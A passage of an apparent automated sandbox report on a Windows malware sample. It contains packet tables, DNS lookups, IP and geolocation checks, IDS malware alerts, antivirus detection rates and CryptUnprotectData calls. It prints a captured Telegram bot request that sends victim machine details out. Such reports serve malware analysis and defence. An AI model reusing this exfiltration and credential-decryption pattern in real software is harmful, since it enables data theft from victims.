Mar 7, 2025 20:44:22.423964977 CET	443	49697	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:22.470459938 CET	49696	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:24.083973885 CET	443	49697	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:24.086023092 CET	49697	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:24.086069107 CET	443	49697	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:24.604299068 CET	443	49697	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:24.604511976 CET	443	49697	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:24.604762077 CET	49697	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:24.605691910 CET	49697	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:24.638556957 CET	49698	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:24.643726110 CET	80	49698	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:24.643860102 CET	49698	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:24.643956900 CET	49698	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:24.648993969 CET	80	49698	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:25.356081963 CET	80	49698	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:25.357817888 CET	49699	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:25.357881069 CET	443	49699	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:25.358274937 CET	49699	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:25.358584881 CET	49699	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:25.358603001 CET	443	49699	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:25.407892942 CET	49698	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:27.170991898 CET	443	49699	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:27.172924995 CET	49699	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:27.172975063 CET	443	49699	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:27.663383007 CET	443	49699	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:27.705084085 CET	49699	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:27.705143929 CET	443	49699	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:27.705332041 CET	443	49699	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:27.705420971 CET	49699	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:27.705712080 CET	49699	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:27.709810972 CET	49698	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:27.711456060 CET	49700	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:27.714984894 CET	80	49698	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:27.715109110 CET	49698	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:27.716487885 CET	80	49700	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:27.716583967 CET	49700	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:27.718631983 CET	49700	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:27.723668098 CET	80	49700	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:28.569462061 CET	80	49700	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:28.572326899 CET	49701	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:28.572429895 CET	443	49701	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:28.572529078 CET	49701	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:28.573214054 CET	49701	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:28.573272943 CET	443	49701	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:28.611210108 CET	49700	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:30.310136080 CET	443	49701	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:30.312630892 CET	49701	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:30.312681913 CET	443	49701	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:31.124403954 CET	443	49701	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:31.124567986 CET	443	49701	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:31.124651909 CET	49701	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:31.126542091 CET	49701	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:31.238425970 CET	49700	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:31.239065886 CET	49702	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:31.243793964 CET	80	49700	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:31.243885994 CET	49700	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:31.244122982 CET	80	49702	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:31.244193077 CET	49702	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:31.244266987 CET	49702	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:31.249244928 CET	80	49702	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:31.934971094 CET	80	49702	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:31.938009977 CET	49703	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:31.938069105 CET	443	49703	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:31.938244104 CET	49703	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:31.938510895 CET	49703	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:31.938523054 CET	443	49703	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:31.986202955 CET	49702	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:34.078444004 CET	443	49703	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:34.114665985 CET	49703	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:34.114722013 CET	443	49703	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:34.610693932 CET	443	49703	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:34.619178057 CET	443	49703	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:34.619239092 CET	49703	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:34.619601965 CET	49703	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:34.624991894 CET	49702	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:34.626493931 CET	49704	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:34.630268097 CET	80	49702	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:34.630319118 CET	49702	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:34.631577969 CET	80	49704	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:34.631660938 CET	49704	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:34.631844044 CET	49704	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:34.636809111 CET	80	49704	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:35.323596001 CET	80	49704	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:35.325347900 CET	49705	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:35.325402021 CET	443	49705	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:35.325491905 CET	49705	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:35.325840950 CET	49705	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:35.325850964 CET	443	49705	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:35.376763105 CET	49704	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:37.094614983 CET	443	49705	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:37.099894047 CET	49705	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:37.099926949 CET	443	49705	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:37.787641048 CET	443	49705	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:37.787811041 CET	443	49705	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:37.787889957 CET	49705	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:37.788489103 CET	49705	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:37.791625977 CET	49704	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:37.793040991 CET	49706	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:37.796988010 CET	80	49704	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:37.797126055 CET	49704	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:37.798254967 CET	80	49706	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:37.798378944 CET	49706	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:37.798582077 CET	49706	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:37.803612947 CET	80	49706	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:38.509582996 CET	80	49706	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:38.511120081 CET	49707	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:38.511168957 CET	443	49707	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:38.511250973 CET	49707	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:38.511574984 CET	49707	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:38.511591911 CET	443	49707	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:38.564263105 CET	49706	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:40.262228012 CET	443	49707	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:40.264477968 CET	49707	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:40.264524937 CET	443	49707	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:40.809931040 CET	443	49707	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:40.810092926 CET	443	49707	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:40.810260057 CET	49707	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:40.810863972 CET	49707	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:40.955898046 CET	49706	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:41.124303102 CET	80	49706	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:41.124429941 CET	49706	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:41.125940084 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:41.125984907 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:41.126069069 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:41.126751900 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:41.126770020 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:43.047485113 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:43.047734022 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:43.053606033 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:43.053632975 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:43.054001093 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:43.056413889 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:43.104331970 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:44.057869911 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:44.102761984 CET	443	49708	149.154.167.220	192.168.2.10
Mar 7, 2025 20:44:44.102838993 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:44.103321075 CET	49708	443	192.168.2.10	149.154.167.220
Mar 7, 2025 20:44:50.026015043 CET	49696	80	192.168.2.10	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 20:44:02.125597954 CET	63292	53	192.168.2.10	1.1.1.1
Mar 7, 2025 20:44:02.133126020 CET	53	63292	1.1.1.1	192.168.2.10
Mar 7, 2025 20:44:04.882289886 CET	55345	53	192.168.2.10	1.1.1.1
Mar 7, 2025 20:44:04.889867067 CET	53	55345	1.1.1.1	192.168.2.10
Mar 7, 2025 20:44:11.092762947 CET	58425	53	192.168.2.10	1.1.1.1
Mar 7, 2025 20:44:11.100910902 CET	53	58425	1.1.1.1	192.168.2.10
Mar 7, 2025 20:44:12.973500013 CET	65155	53	192.168.2.10	1.1.1.1
Mar 7, 2025 20:44:12.982579947 CET	53	65155	1.1.1.1	192.168.2.10
Mar 7, 2025 20:44:40.956960917 CET	62144	53	192.168.2.10	1.1.1.1
Mar 7, 2025 20:44:41.124958992 CET	53	62144	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 20:44:02.125597954 CET	192.168.2.10	1.1.1.1	0xefee	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:04.882289886 CET	192.168.2.10	1.1.1.1	0xfb6a	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:11.092762947 CET	192.168.2.10	1.1.1.1	0xf9fd	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.973500013 CET	192.168.2.10	1.1.1.1	0x6952	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:40.956960917 CET	192.168.2.10	1.1.1.1	0x5a27	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 20:44:02.133126020 CET	1.1.1.1	192.168.2.10	0xefee	No error (0)	drive.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:04.889867067 CET	1.1.1.1	192.168.2.10	0xfb6a	No error (0)	drive.usercontent.google.com		172.217.18.97	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:11.100910902 CET	1.1.1.1	192.168.2.10	0xf9fd	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 7, 2025 20:44:11.100910902 CET	1.1.1.1	192.168.2.10	0xf9fd	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:11.100910902 CET	1.1.1.1	192.168.2.10	0xf9fd	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:11.100910902 CET	1.1.1.1	192.168.2.10	0xf9fd	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:11.100910902 CET	1.1.1.1	192.168.2.10	0xf9fd	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:11.100910902 CET	1.1.1.1	192.168.2.10	0xf9fd	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.982579947 CET	1.1.1.1	192.168.2.10	0x6952	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.982579947 CET	1.1.1.1	192.168.2.10	0x6952	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.982579947 CET	1.1.1.1	192.168.2.10	0x6952	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.982579947 CET	1.1.1.1	192.168.2.10	0x6952	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.982579947 CET	1.1.1.1	192.168.2.10	0x6952	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.982579947 CET	1.1.1.1	192.168.2.10	0x6952	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:12.982579947 CET	1.1.1.1	192.168.2.10	0x6952	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 20:44:41.124958992 CET	1.1.1.1	192.168.2.10	0x5a27	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49691	132.226.247.73	80	6252	C:\Users\user\Desktop\pkNnK2ya0f.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 20:44:11.110780954 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 20:44:11.818131924 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 19:44:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 20:44:11.827836037 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 20:44:12.041105986 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 19:44:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 20:44:16.222915888 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 20:44:16.435543060 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 19:44:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49694	132.226.247.73	80	6252	C:\Users\user\Desktop\pkNnK2ya0f.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 20:44:18.754101992 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 20:44:19.457384109 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 19:44:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49696	132.226.247.73	80	6252	C:\Users\user\Desktop\pkNnK2ya0f.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 20:44:21.710388899 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 20:44:22.419866085 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 19:44:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49698	132.226.247.73	80	6252	C:\Users\user\Desktop\pkNnK2ya0f.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 20:44:24.643956900 CET	151	OUT

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D0C90 CryptUnprotectData,		9_2_399D0C90
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D13B8 CryptUnprotectData,		9_2_399D13B8

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:01:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49694 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49691 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49696 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49693 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49689 -> 172.217.16.142:443

Source: pkNnK2ya0f.exe	Virustotal: Detection: 61%			Perma Link
Source: pkNnK2ya0f.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 05F1F45Dh	9_2_05F1F4AC
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 05F1F45Dh	9_2_05F1F2C0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 05F1FC19h	9_2_05F1F960
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397ED099h	9_2_397ECDF0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EEC61h	9_2_397EE9B8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397E3310h	9_2_397E2EF8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397E2D49h	9_2_397E2A98
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EE809h	9_2_397EE560
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_397E0040
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EDEE1h	9_2_397EDC38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EE361h	9_2_397EE0B8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397E0D0Dh	9_2_397E0B30
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397E16F8h	9_2_397E0B30
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EDA89h	9_2_397ED7E0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397E3310h	9_2_397E323E
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EF0E1h	9_2_397EEE38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397E3310h	9_2_397E2EF2
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397ED591h	9_2_397ED2E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EF991h	9_2_397EF6E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 397EF539h	9_2_397EF290
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DD078h	9_2_399DCD80
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DFD88h	9_2_399DFA90
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D4CF7h	9_2_399D4A28
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D037Dh	9_2_399D0040
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D1748h	9_2_399D1478
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DC9D0h	9_2_399DC660
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D4867h	9_2_399D4598
